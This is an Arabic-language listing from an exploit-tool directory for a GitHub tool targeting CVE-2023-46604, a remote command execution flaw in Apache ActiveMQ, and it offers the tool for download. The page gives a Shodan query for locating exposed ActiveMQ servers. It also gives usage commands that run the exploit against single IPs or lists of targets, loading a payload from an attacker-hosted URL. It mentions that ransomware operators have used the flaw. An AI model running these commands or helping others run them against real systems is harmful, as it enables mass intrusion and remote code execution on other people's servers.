Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-46604 — استغلال لـ CVE-2023-46604 | Kitploit
أدوات/GitHubGitHub/mrpentst/cve-2023-46604
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubmrpentst/cve-2023-46604

CVE-2023-46604

استغلال لـ CVE-2023-46604

عرض المستودع
22منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-46604

استغلال لـ CVE-2023-46604

تساعد هذه الأداة في استغلال هذه الثغرة.

استعلام Shodan للعثور على الهدف:

root@kitploit:~
product:"ActiveMQ" port:"61616"

استخدام الأداة:

root@kitploit:~
لقراءة الأهداف من الملف:
python3 exploit.py -f targets -c http://YourVPS/poc.xml
---
هدف واحد:
python3 exploit.py -ip IP -c http://YourVPS/poc.xml

حول هذه الثغرة:

CVE-2023-46604 هي ثغرة حرجة لتنفيذ الأوامر عن بُعد في Apache ActiveMQ، وهو برنامج وسيط للرسائل مفتوح المصدر. تسمح هذه الثغرة لمهاجم عن بُعد لديه وصول إلى الشبكة إما إلى وسيط OpenWire المستند إلى Java أو العميل بتنفيذ أوامر شل عشوائية. يتم تحقيق ذلك عن طريق التلاعب بأنواع الفئات المتسلسلة في بروتوكول OpenWire، مما يتسبب في أن يقوم الوسيط بإنشاء أي فئة على مسار الفئات. تنتج الثغرة عن إلغاء تسلسل غير آمن داخل Apache ActiveMQ وقد تم استغلالها من قبل المهاجمين، بما في ذلك عائلة برامج الفدية HelloKitty، لتشغيل ملفات الفدية الثنائية واختراق الأنظمة بالكامل.

تنزيل الأداة